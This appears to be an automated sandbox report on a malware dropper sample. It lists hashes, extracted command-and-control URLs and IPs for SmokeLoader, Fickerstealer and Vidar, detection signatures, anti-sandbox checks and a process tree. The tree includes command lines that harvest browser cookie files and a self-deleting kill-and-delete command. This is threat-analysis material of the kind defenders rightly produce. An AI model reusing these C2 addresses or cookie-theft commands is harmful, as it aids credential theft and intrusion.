Analysis
  max time kernel: 95s
  max time network: 153s
  platform: windows10_x64
  resource: win10v20210408
  submitted: 20-07-2021 04:02

Static task: static1
Behavioral task: behavioral1
  Sample: 88A990A868EADA802839185B6F05C541.exe
  Resource: win7v20210408
Behavioral task: behavioral2
  Sample: 88A990A868EADA802839185B6F05C541.exe
  Resource: win10v20210408

General
  Target: 88A990A868EADA802839185B6F05C541.exe
  Size: 3.2MB
  MD5: 88a990a868eada802839185b6f05c541
  SHA1: 499be12d4fe4f30e672601b1ccbfc4f014a8bca8
  SHA256: 474a473bf46fdbfb5a9344937674c1455d764e74c2cd8892da7d59f68ffadd5c
  SHA512: 7bd11e52a079da6584669707617a433a9f233a7300057d4751872ab202dc665b9c8429df7a641951ef04f51af74fe09e5ac6be49aa7fe2aedb235409e0243cad
Malware Config
  Extracted: smokeloader 2020
    http://conceitosseg.com/upload/
    http://integrasidata.com/upload/
    http://ozentekstil.com/upload/
    http://finbelportal.com/upload/
    http://telanganadigital.com/upload/
  Extracted: fickerstealer
    37.0.8.225:80
  Extracted: vidar 39.6 865
    https://sslamlssa1.tumblr.com/
    profile_id: 865
  Extracted: vidar 39.6 903
    https://sslamlssa1.tumblr.com/
    profile_id: 903
  Extracted: metasploit
    windows/single_exec
Signatures

Fickerstealer
  Ficker is an infostealer written in Rust and ASM.

Glupteba Payload (2 IoCs)
  resource / yara_rule
    behavioral2/memory/1464-527-0x00000000014A0000-0x0000000001DC6000-memory.dmp  family_glupteba
    behavioral2/memory/1464-529-0x0000000000400000-0x0000000000D41000-memory.dmp  family_glupteba
MetaSploit
  Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

Process spawned unexpected child process (4 IoCs)
  This typically indicates the parent process was compromised via an exploit or macro.
  description / pid / pid_target / Process / procid_target
    Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  4496  3384  rUNdlL32.eXe  45
    Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  5396  3384  rUNdlL32.eXe  45
    Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  4564  3384  rUNdlL32.eXe  45
    Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  6648  3384  rUNdlL32.eXe  45
RedLine
  RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload (8 IoCs)
  resource / yara_rule
    behavioral2/files/0x000100000001abf2-366.dat  family_redline
    behavioral2/files/0x000100000001abf2-365.dat  family_redline
    behavioral2/memory/6044-444-0x0000000000417E26-mapping.dmp  family_redline
    behavioral2/memory/6064-445-0x0000000000417E1E-mapping.dmp  family_redline
    behavioral2/memory/4296-489-0x0000000000417E22-mapping.dmp  family_redline
    behavioral2/memory/4296-500-0x0000000004E00000-0x0000000005406000-memory.dmp  family_redline
    behavioral2/memory/4904-517-0x0000000000417DEE-mapping.dmp  family_redline
    behavioral2/memory/5920-525-0x0000000000417DEA-mapping.dmp  family_redline

SmokeLoader
  Modular backdoor trojan in use since 2014.

Socelars Payload (2 IoCs)
  resource / yara_rule
    behavioral2/files/0x000100000001ab2f-144.dat  family_socelars
    behavioral2/files/0x000100000001ab2f-143.dat  family_socelars
Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs)

Vidar Stealer (4 IoCs)
  resource / yara_rule
    behavioral2/memory/5804-472-0x0000000002680000-0x000000000271D000-memory.dmp  family_vidar
    behavioral2/memory/5488-485-0x000000000046B76D-mapping.dmp  family_vidar
    behavioral2/memory/5804-478-0x0000000000400000-0x00000000009F0000-memory.dmp  family_vidar
    behavioral2/memory/5488-499-0x0000000000400000-0x00000000004A1000-memory.dmp  family_vidar

Downloads MZ/PE file

Executes dropped EXE (36 IoCs)
  pid / Process
    3200  Files.exe
    1148  File.exe
    1908  Folder.exe
    3140  KRSetp.exe
    3920  Info.exe
    4152  jg3_3uag.exe
    4240  Folder.exe
    4200  Install.exe
    4304  pub2.exe
    5056  biaefvj
    5196  LNXz4peJ_8ZzfRBexFSZCeeA.exe
    5204  Mnr__Rr2OKzsxfOBINPifWt4.exe
    5184  nKfknZKhwp5nxxbZvhxI66_E.exe
    5168  vfO6gwyWSeGrYGgCMvVCzYNj.exe
    5176  C_ApEiCLnEiR_RLejH6vF1Mv.exe
    5236  4gVRAMZibFMa2cjSSUDELd7Q.exe
    5264  cmF0KfcxRZsKpz_jGg9BNZbS.exe
    5340  txwju7KqHciQvUjVbPKUeEkl.exe
    5412  iwxWWGVxR3Uowz3HZszRjroq.exe
    5520  5D73.exe
    5700  6mq72uEDlO8PvAyx8SsxRD7D.exe
    5784  TZWAYtMVnr7WtnJ3GhcUDLxp.exe
    5804  UrN6lb3a_OKPUuxjic9qNDU6.exe
    5828  XO8LPI42kK5rFGIX30qEmIJm.exe
    5872  rteEoHmAeIECR3WOOBfQi8TF.exe
    5900  vcwFgU6ktFApk5A8Q2tvcvlA.exe
    5964  PING.EXE
    6108  wc5C0EUt5fcejaA3jOnxOeYi.exe
    6136  NkQMFCgtR5NPdWS_ZbJfCPpp.exe
    1464  woxBH7Nr6giQWt9wnhy33pk6.exe
    4928  0evkxxGDpJ9t_tofxo4TSlGo.exe
    6072  C_ApEiCLnEiR_RLejH6vF1Mv.exe
    6044  LNXz4peJ_8ZzfRBexFSZCeeA.exe
    6064  4gVRAMZibFMa2cjSSUDELd7Q.exe
    4016  C_ApEiCLnEiR_RLejH6vF1Mv.exe
    5548  5D73.exe

YARA rule matches: vmprotect (3 IoCs)
  resource / yara_rule
    behavioral2/files/0x000100000001ab2e-136.dat  vmprotect
    behavioral2/files/0x000100000001ab2e-137.dat  vmprotect
    behavioral2/memory/4152-142-0x0000000000400000-0x00000000005DB000-memory.dmp  vmprotect
Checks BIOS information in registry (2 TTPs, 4 IoCs)
  BIOS information is often read in order to detect sandboxing environments.
  description / ioc / Process
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  0evkxxGDpJ9t_tofxo4TSlGo.exe
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion  0evkxxGDpJ9t_tofxo4TSlGo.exe
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  rteEoHmAeIECR3WOOBfQi8TF.exe
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion  rteEoHmAeIECR3WOOBfQi8TF.exe

Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up country code configured in the registry, likely geofence.
  description / ioc / Process
    Key value queried  \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation  88A990A868EADA802839185B6F05C541.exe
    Key value queried  \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation  Files.exe

Loads dropped DLL (2 IoCs)
  pid / Process
    4532  rundll32.exe
    4304  pub2.exe

Modifies file permissions (1 TTPs, 1 IoCs)
  pid / Process
    4624  icacls.exe
Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.

YARA rule matches: themida (1 IoCs)
  resource / yara_rule
    behavioral2/files/0x000100000001ac10-415.dat  themida

Checks installed software on the system (1 TTPs)
  Looks up Uninstall key entries in the registry to enumerate software on the system.

Registry queries of the EnableLUA value (3 IoCs)
  description / ioc / Process
    Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  jg3_3uag.exe
    Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  rteEoHmAeIECR3WOOBfQi8TF.exe
    Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  0evkxxGDpJ9t_tofxo4TSlGo.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTPs)

Looks up external IP address via web service (9 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow / ioc
    14   ipinfo.io
    20   ipinfo.io
    63   ip-api.com
    185  api.2ip.ua
    187  api.2ip.ua
    218  ipinfo.io
    189  api.ipify.org
    219  ipinfo.io
    283  ipinfo.io

Drops file in System32 directory (2 IoCs)
  description / ioc / Process
    File opened for modification  C:\Windows\System32\Tasks\Firefox Default Browser Agent A2B00CC4F2A6A725  svchost.exe
    File opened for modification  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat  svchost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  pid / Process
    5872  rteEoHmAeIECR3WOOBfQi8TF.exe
    4928  0evkxxGDpJ9t_tofxo4TSlGo.exe

Suspicious use of SetThreadContext (5 IoCs)
  description / pid / Process / procid_target
    PID 1104 set thread context of 4668  1104  svchost.exe  94
    PID 5196 set thread context of 6044  5196  LNXz4peJ_8ZzfRBexFSZCeeA.exe  132
    PID 5236 set thread context of 6064  5236  4gVRAMZibFMa2cjSSUDELd7Q.exe  134
    PID 5520 set thread context of 5548  5520  5D73.exe  143
    PID 5204 set thread context of 5488  5204  Mnr__Rr2OKzsxfOBINPifWt4.exe  149
autoit_exe (2 IoCs)
  AutoIT scripts compiled to PE executables.
  resource / yara_rule
    behavioral2/files/0x000200000001ab32-122.dat  autoit_exe
    behavioral2/files/0x000200000001ab32-123.dat  autoit_exe

Drops file in Program Files directory (7 IoCs)
  description / ioc / Process
    File opened for modification  C:\Program Files (x86)\EverestSoftrade\TonerRecover\Toner-Recover.exe  nKfknZKhwp5nxxbZvhxI66_E.exe
    File opened for modification  C:\Program Files (x86)\EverestSoftrade\TonerRecover\adj.reg  nKfknZKhwp5nxxbZvhxI66_E.exe
    File opened for modification  C:\Program Files (x86)\EverestSoftrade\TonerRecover\adj2.reg  nKfknZKhwp5nxxbZvhxI66_E.exe
    File opened for modification  C:\Program Files (x86)\EverestSoftrade\TonerRecover\log.bat  nKfknZKhwp5nxxbZvhxI66_E.exe
    File opened for modification  C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe  nKfknZKhwp5nxxbZvhxI66_E.exe
    File opened for modification  C:\Program Files (x86)\EverestSoftrade\TonerRecover\Uninstall.exe  nKfknZKhwp5nxxbZvhxI66_E.exe
    File created  C:\Program Files (x86)\EverestSoftrade\TonerRecover\Uninstall.ini  nKfknZKhwp5nxxbZvhxI66_E.exe

Drops file in Windows directory (1 IoCs)
  description / ioc / Process
    File opened for modification  C:\Windows\Debug\ESE.TXT  MicrosoftEdge.exe

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Program crash (12 IoCs)
  pid / pid_target / Process / procid_target
    5976  5056  WerFault.exe  106
    6004  5828  WerFault.exe  126
    5040  5828  WerFault.exe  126
    1780  5828  WerFault.exe  126
    4492  5828  WerFault.exe  126
    5156  5828  WerFault.exe  126
    2716  1464  WerFault.exe  139
    7916  6060  WerFault.exe  252
    8092  6060  WerFault.exe  252
    7668  6060  WerFault.exe  252
    4520  6060  WerFault.exe  252
    6996  7752  WerFault.exe  277
Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
  SCSI information is often read in order to detect sandboxing environments.
  description / ioc / Process
    Key opened      \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  pub2.exe
    Key queried     \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  pub2.exe
    Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  pub2.exe

Checks processor information in registry (2 TTPs, 2 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  description / ioc / Process
    Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0  svchost.exe
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz  svchost.exe

Delays execution with timeout.exe (1 IoCs)
  pid / Process
    6468  timeout.exe

Kills process with taskkill (4 IoCs)
  pid / Process
    4240  taskkill.exe
    7048  taskkill.exe
    7280  taskkill.exe
    8144  taskkill.exe

Registry keys created under Internet Explorer\Main (3 IoCs)
  description / ioc / Process
    Key created  \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main  MicrosoftEdge.exe
    Key created  \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main  browser_broker.exe
    Key created  \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main  MicrosoftEdgeCP.exe
Modifies data under HKEY_USERS (15 IoCs)
  description / ioc / Process
    Key created      \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\16\52C64B7E  svchost.exe
    Key created      \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache  svchost.exe
    Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\  svchost.exe
    Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"  svchost.exe
    Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit  svchost.exe
    Key created      \REGISTRY\USER\.DEFAULT\Software  svchost.exe
    Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"  svchost.exe
    Set value (str)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"  svchost.exe
    Set value (str)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"  svchost.exe
    Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft  svchost.exe
    Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie  svchost.exe
    Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7"  svchost.exe
    Set value (str)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix  svchost.exe
    Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"  svchost.exe
    Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"  svchost.exe

Modifies registry class (64 IoCs)
Runs .reg file with regedit (2 IoCs)
  pid / Process
    4800  regedit.exe
    6156  regedit.exe

Runs ping.exe (1 TTPs, 2 IoCs)
  pid / Process
    5964  PING.EXE
    6408  PING.EXE

Suspicious behavior: EnumeratesProcesses (64 IoCs)
  pid / Process (repeated entries collapsed, count in parentheses)
    4532  rundll32.exe (2)
    1104  svchost.exe (2)
    4304  pub2.exe (2)
    3060  Process not Found (58)

Suspicious behavior: MapViewOfSection (3 IoCs)
  pid / Process
    4456  MicrosoftEdgeCP.exe
    4456  MicrosoftEdgeCP.exe
    4304  pub2.exe
Suspicious use of AdjustPrivilegeToken (64 IoCs)
  pid / Process / Token (entries grouped by process, in report order; repeat counts in parentheses)
    3112  MicrosoftEdge.exe    SeDebugPrivilege (4)
    4200  Install.exe          SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, 31, 32, 33, 34, 35
    3140  KRSetp.exe           SeDebugPrivilege
    4532  rundll32.exe         SeDebugPrivilege
    1104  svchost.exe          SeDebugPrivilege
    4532  rundll32.exe         SeDebugPrivilege (12)
    4604  MicrosoftEdgeCP.exe  SeDebugPrivilege (4)
    3060  Process not Found    SeShutdownPrivilege, SeCreatePagefilePrivilege, SeShutdownPrivilege, SeCreatePagefilePrivilege, SeShutdownPrivilege, SeCreatePagefilePrivilege, SeShutdownPrivilege
Suspicious use of FindShellTrayWindow 4 IoCs
pid / Process
1148 File.exe (x4)
Suspicious use of SendNotifyMessage 4 IoCs
pid / Process
1148 File.exe (x4)
Suspicious use of SetWindowsHookEx 11 IoCs
pid / Process
3112 MicrosoftEdge.exe
3920 Info.exe
4456 MicrosoftEdgeCP.exe (x2)
5184 nKfknZKhwp5nxxbZvhxI66_E.exe
5264 cmF0KfcxRZsKpz_jGg9BNZbS.exe
5412 iwxWWGVxR3Uowz3HZszRjroq.exe
5804 UrN6lb3a_OKPUuxjic9qNDU6.exe
5900 vcwFgU6ktFApk5A8Q2tvcvlA.exe
6136 NkQMFCgtR5NPdWS_ZbJfCPpp.exe
6108 wc5C0EUt5fcejaA3jOnxOeYi.exe
Suspicious use of WriteProcessMemory 64 IoCs
description / pid / Process / procid_target
PID 656 (88A990A868EADA802839185B6F05C541.exe) wrote to memory of PID 3200 - target #75 (x3)
PID 3200 (Files.exe) wrote to memory of PID 1148 - target #77 (x3)
PID 656 (88A990A868EADA802839185B6F05C541.exe) wrote to memory of PID 1908 - target #81 (x3)
PID 656 (88A990A868EADA802839185B6F05C541.exe) wrote to memory of PID 3140 - target #83 (x2)
PID 656 (88A990A868EADA802839185B6F05C541.exe) wrote to memory of PID 3920 - target #84 (x3)
PID 656 (88A990A868EADA802839185B6F05C541.exe) wrote to memory of PID 4152 - target #85 (x3)
PID 1908 (Folder.exe) wrote to memory of PID 4240 - target #87 (x3)
PID 656 (88A990A868EADA802839185B6F05C541.exe) wrote to memory of PID 4200 - target #86 (x3)
PID 656 (88A990A868EADA802839185B6F05C541.exe) wrote to memory of PID 4304 - target #89 (x3)
PID 4496 (rUNdlL32.eXe) wrote to memory of PID 4532 - target #92 (x3)
PID 4532 (rundll32.exe) wrote to memory of PID 1104 - target #69
PID 1104 (svchost.exe) wrote to memory of PID 4668 - target #94 (x2)
PID 4532 (rundll32.exe) wrote to memory of PID 2788 - target #53
PID 1104 (svchost.exe) wrote to memory of PID 4668 - target #94
PID 4532 (rundll32.exe) wrote to memory of PID 340 - target #36
PID 4532 (rundll32.exe) wrote to memory of PID 2396 - target #60
PID 4532 (rundll32.exe) wrote to memory of PID 2412 - target #59
PID 4532 (rundll32.exe) wrote to memory of PID 1092 - target #14
PID 4532 (rundll32.exe) wrote to memory of PID 1040 - target #13
PID 4532 (rundll32.exe) wrote to memory of PID 1424 - target #21
PID 4532 (rundll32.exe) wrote to memory of PID 1960 - target #31
PID 4532 (rundll32.exe) wrote to memory of PID 1248 - target #17
PID 4532 (rundll32.exe) wrote to memory of PID 1240 - target #18
PID 4532 (rundll32.exe) wrote to memory of PID 2636 - target #56
PID 4532 (rundll32.exe) wrote to memory of PID 2692 - target #55
PID 4456 (MicrosoftEdgeCP.exe) wrote to memory of PID 4604 - target #93 (x4)
PID 4456 (MicrosoftEdgeCP.exe) wrote to memory of PID 2816 - target #96 (x4)
PID 4200 (Install.exe) wrote to memory of PID 4336 - target #101 (x3)
PID 4336 (cmd.exe) wrote to memory of PID 4240 - target #103 (x3)
PID 1040 (svchost.exe) wrote to memory of PID 5056 - target #106 (x3)
PID 3920 (Info.exe) wrote to memory of PID 5204 - target #112 (x2)
Processes
c:\windows\system32\svchost.exe [PID 1040]
  cmd: c:\windows\system32\svchost.exe -k netsvcs -s Schedule
  - Drops file in System32 directory
  - Suspicious use of WriteProcessMemory
    C:\Users\Admin\AppData\Roaming\biaefvj [PID 5056]
      cmd: C:\Users\Admin\AppData\Roaming\biaefvj
      - Executes dropped EXE
        C:\Windows\SysWOW64\WerFault.exe [PID 5976]
          cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 5056 -s 484
          - Program crash
c:\windows\system32\svchost.exe [PID 1092]
  cmd: c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
c:\windows\system32\svchost.exe [PID 1248]
  cmd: c:\windows\system32\svchost.exe -k netsvcs -s Themes
c:\windows\system32\svchost.exe [PID 1240]
  cmd: c:\windows\system32\svchost.exe -k netsvcs -s UserManager
c:\windows\system32\svchost.exe [PID 1424]
  cmd: c:\windows\system32\svchost.exe -k netsvcs -s SENS
c:\windows\system32\svchost.exe [PID 1960]
  cmd: c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
c:\windows\system32\svchost.exe [PID 340]
  cmd: c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
c:\windows\system32\svchost.exe [PID 2788]
  cmd: c:\windows\system32\svchost.exe -k netsvcs -s Browser
c:\windows\system32\svchost.exe [PID 2692]
  cmd: c:\windows\system32\svchost.exe -k netsvcs -s WpnService
c:\windows\system32\svchost.exe [PID 2636]
  cmd: c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
c:\windows\system32\svchost.exe [PID 2412]
  cmd: c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
c:\windows\system32\svchost.exe [PID 2396]
  cmd: c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
C:\Users\Admin\AppData\Local\Temp\88A990A868EADA802839185B6F05C541.exe [PID 656]
  cmd: "C:\Users\Admin\AppData\Local\Temp\88A990A868EADA802839185B6F05C541.exe"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
    C:\Users\Admin\AppData\Local\Temp\Files.exe [PID 3200]
      cmd: "C:\Users\Admin\AppData\Local\Temp\Files.exe"
      - Executes dropped EXE
      - Checks computer location settings
      - Suspicious use of WriteProcessMemory
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe [PID 1148]
          cmd: "C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe"
          - Executes dropped EXE
          - Suspicious use of FindShellTrayWindow
          - Suspicious use of SendNotifyMessage
    C:\Users\Admin\AppData\Local\Temp\Folder.exe [PID 1908]
      cmd: "C:\Users\Admin\AppData\Local\Temp\Folder.exe"
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
        C:\Users\Admin\AppData\Local\Temp\Folder.exe [PID 4240]
          cmd: "C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a
          - Executes dropped EXE
    C:\Users\Admin\AppData\Local\Temp\KRSetp.exe [PID 3140]
      cmd: "C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
    C:\Users\Admin\AppData\Local\Temp\Info.exe [PID 3920]
      cmd: "C:\Users\Admin\AppData\Local\Temp\Info.exe"
      - Executes dropped EXE
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory
        C:\Users\Admin\Documents\vfO6gwyWSeGrYGgCMvVCzYNj.exe [PID 5168]
          cmd: "C:\Users\Admin\Documents\vfO6gwyWSeGrYGgCMvVCzYNj.exe"
          - Executes dropped EXE
            C:\Users\Admin\Documents\vfO6gwyWSeGrYGgCMvVCzYNj.exe [PID 4296]
              cmd: C:\Users\Admin\Documents\vfO6gwyWSeGrYGgCMvVCzYNj.exe
        C:\Users\Admin\Documents\nKfknZKhwp5nxxbZvhxI66_E.exe [PID 5184]
          cmd: "C:\Users\Admin\Documents\nKfknZKhwp5nxxbZvhxI66_E.exe"
          - Executes dropped EXE
          - Drops file in Program Files directory
          - Suspicious use of SetWindowsHookEx
            C:\Windows\SysWOW64\cmd.exe [PID 5716]
              cmd: C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\EverestSoftrade\TonerRecover\log.bat" "
                C:\Windows\SysWOW64\explorer.exe [PID 1508]
                  cmd: explorer https://iplogger.org/2LBCU6
                C:\Windows\SysWOW64\regedit.exe [PID 4800]
                  cmd: regedit /s adj.reg
                  - Runs .reg file with regedit
                C:\Windows\SysWOW64\regedit.exe [PID 6156]
                  cmd: regedit /s adj2.reg
                  - Runs .reg file with regedit
            C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe [PID 3500]
              cmd: "C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe"
                C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe [PID 6328]
                  cmd: "C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe"
        C:\Users\Admin\Documents\C_ApEiCLnEiR_RLejH6vF1Mv.exe [PID 5176]
          cmd: "C:\Users\Admin\Documents\C_ApEiCLnEiR_RLejH6vF1Mv.exe"
          - Executes dropped EXE
            C:\Users\Admin\Documents\C_ApEiCLnEiR_RLejH6vF1Mv.exe [PID 6072]
              cmd: C:\Users\Admin\Documents\C_ApEiCLnEiR_RLejH6vF1Mv.exe
              - Executes dropped EXE
            C:\Users\Admin\Documents\C_ApEiCLnEiR_RLejH6vF1Mv.exe [PID 4016]
              cmd: C:\Users\Admin\Documents\C_ApEiCLnEiR_RLejH6vF1Mv.exe
              - Executes dropped EXE
            C:\Users\Admin\Documents\C_ApEiCLnEiR_RLejH6vF1Mv.exe [PID 5280]
              cmd: C:\Users\Admin\Documents\C_ApEiCLnEiR_RLejH6vF1Mv.exe
            C:\Users\Admin\Documents\C_ApEiCLnEiR_RLejH6vF1Mv.exe [PID 5920]
              cmd: C:\Users\Admin\Documents\C_ApEiCLnEiR_RLejH6vF1Mv.exe
        C:\Users\Admin\Documents\Mnr__Rr2OKzsxfOBINPifWt4.exe [PID 5204]
          cmd: "C:\Users\Admin\Documents\Mnr__Rr2OKzsxfOBINPifWt4.exe"
          - Executes dropped EXE
          - Suspicious use of SetThreadContext
            C:\Users\Admin\Documents\Mnr__Rr2OKzsxfOBINPifWt4.exe [PID 5488]
              cmd: C:\Users\Admin\Documents\Mnr__Rr2OKzsxfOBINPifWt4.exe
                C:\Windows\SysWOW64\cmd.exe [PID 6644]
                  cmd: "C:\Windows\System32\cmd.exe" /c taskkill /im Mnr__Rr2OKzsxfOBINPifWt4.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\Mnr__Rr2OKzsxfOBINPifWt4.exe" & del C:\ProgramData\*.dll & exit
                    C:\Windows\SysWOW64\taskkill.exe [PID 7280]
                      cmd: taskkill /im Mnr__Rr2OKzsxfOBINPifWt4.exe /f
                      - Kills process with taskkill
        C:\Users\Admin\Documents\LNXz4peJ_8ZzfRBexFSZCeeA.exe [PID 5196]
          cmd: "C:\Users\Admin\Documents\LNXz4peJ_8ZzfRBexFSZCeeA.exe"
          - Executes dropped EXE
          - Suspicious use of SetThreadContext
            C:\Users\Admin\Documents\LNXz4peJ_8ZzfRBexFSZCeeA.exe [PID 6044]
              cmd: C:\Users\Admin\Documents\LNXz4peJ_8ZzfRBexFSZCeeA.exe
              - Executes dropped EXE
        C:\Users\Admin\Documents\4gVRAMZibFMa2cjSSUDELd7Q.exe [PID 5236]
          cmd: "C:\Users\Admin\Documents\4gVRAMZibFMa2cjSSUDELd7Q.exe"
          - Executes dropped EXE
          - Suspicious use of SetThreadContext
            C:\Users\Admin\Documents\4gVRAMZibFMa2cjSSUDELd7Q.exe [PID 6064]
              cmd: C:\Users\Admin\Documents\4gVRAMZibFMa2cjSSUDELd7Q.exe
              - Executes dropped EXE
        C:\Users\Admin\Documents\iwxWWGVxR3Uowz3HZszRjroq.exe [PID 5412]
          cmd: "C:\Users\Admin\Documents\iwxWWGVxR3Uowz3HZszRjroq.exe"
          - Executes dropped EXE
          - Suspicious use of SetWindowsHookEx
            C:\Users\Admin\AppData\Local\Temp\11111.exe [PID 4300]
              cmd: C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            C:\Users\Admin\AppData\Local\Temp\11111.exe [PID 5724]
              cmd: C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            C:\Users\Admin\AppData\Local\Temp\22222.exe [PID 7060]
              cmd: C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            C:\Users\Admin\AppData\Local\Temp\22222.exe [PID 6724]
              cmd: C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        C:\Users\Admin\Documents\txwju7KqHciQvUjVbPKUeEkl.exe [PID 5340]
          cmd: "C:\Users\Admin\Documents\txwju7KqHciQvUjVbPKUeEkl.exe"
          - Executes dropped EXE
        C:\Users\Admin\Documents\cmF0KfcxRZsKpz_jGg9BNZbS.exe [PID 5264]
          cmd: "C:\Users\Admin\Documents\cmF0KfcxRZsKpz_jGg9BNZbS.exe"
          - Executes dropped EXE
          - Suspicious use of SetWindowsHookEx
            C:\Windows\SysWOW64\cmd.exe [PID 4340]
